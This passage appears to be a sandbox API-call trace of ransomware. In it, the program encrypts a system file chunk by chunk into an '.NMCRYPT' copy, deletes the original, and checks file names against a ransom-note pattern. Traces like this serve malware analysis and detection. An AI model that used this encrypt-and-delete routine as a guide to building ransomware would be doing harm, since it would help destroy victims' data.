returned 1 [0168.751] wcslen (_String="\\\\?\\") returned 0x4 [0168.751] CryptDuplicateKey (in: hKey=0x9ad8b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2f8) returned 1 [0168.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0168.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0168.752] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=6656) returned 1 [0168.752] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0168.752] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.757] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.758] GetLastError () returned 0x0 [0168.758] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.947] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.947] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.947] GetLastError () returned 0x0 [0168.947] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.948] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.948] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.948] GetLastError () returned 0x0 [0168.948] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.948] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.948] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.948] GetLastError () returned 0x0 [0168.948] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.948] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.948] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.948] GetLastError () returned 0x0 [0168.948] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.948] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.948] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.948] GetLastError () returned 0x0 [0168.948] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.948] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.948] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.948] GetLastError () returned 0x0 [0168.948] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.948] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.948] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.948] GetLastError () returned 0x0 [0168.948] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.949] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.949] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.949] GetLastError () returned 0x0 [0168.949] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.949] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.949] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.949] GetLastError () returned 0x0 [0168.949] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.949] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.949] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.949] GetLastError () returned 0x0 [0168.949] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.949] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.949] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.949] GetLastError () returned 0x0 [0168.949] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.949] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.949] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.949] GetLastError () returned 0x0 [0168.949] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.949] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.949] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.949] GetLastError () returned 0x0 [0168.949] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.949] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.950] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.950] GetLastError () returned 0x0 [0168.950] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.950] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.950] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.950] GetLastError () returned 0x0 [0168.950] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.950] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.950] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.950] GetLastError () returned 0x0 [0168.950] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.950] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.950] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.950] GetLastError () returned 0x0 [0168.950] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.950] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.950] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.951] GetLastError () returned 0x0 [0168.951] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.951] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.951] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.951] GetLastError () returned 0x0 [0168.951] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.951] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.951] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.951] GetLastError () returned 0x0 [0168.951] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.951] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.951] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.951] GetLastError () returned 0x0 [0168.951] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.951] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.951] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.951] GetLastError () returned 0x0 [0168.951] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.951] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.951] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.951] GetLastError () returned 0x0 [0168.951] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.951] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.951] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.952] GetLastError () returned 0x0 [0168.952] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.952] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.952] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0168.952] GetLastError () returned 0x0 [0168.952] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0168.952] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0168.952] WriteFile (in: hFile=0x15c4, lpBuffer=0x2893368*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0168.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui")) returned 0x20 [0168.952] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui", dwFileAttributes=0x20) returned 0 [0168.952] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned 1 [0168.952] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui")) returned 0 [0168.953] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" [0168.953] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 1 [0168.953] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX791.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx791.tmp")) returned 0x791 [0168.954] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX791.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx791.tmp"), dwFlags=0x1) returned 0 [0168.955] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX791.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx791.tmp")) returned 1 [0168.955] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0168.955] wcslen (_String="OK") returned 0x2 [0168.955] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.955] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.955] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0168.955] CryptDestroyHash (hHash=0x9ad478) returned 1 [0168.955] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0168.955] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0168.955] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*NMCRYPT") returned 0 [0168.955] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0168.955] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*.exe") returned 0 [0168.955] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*.dll") 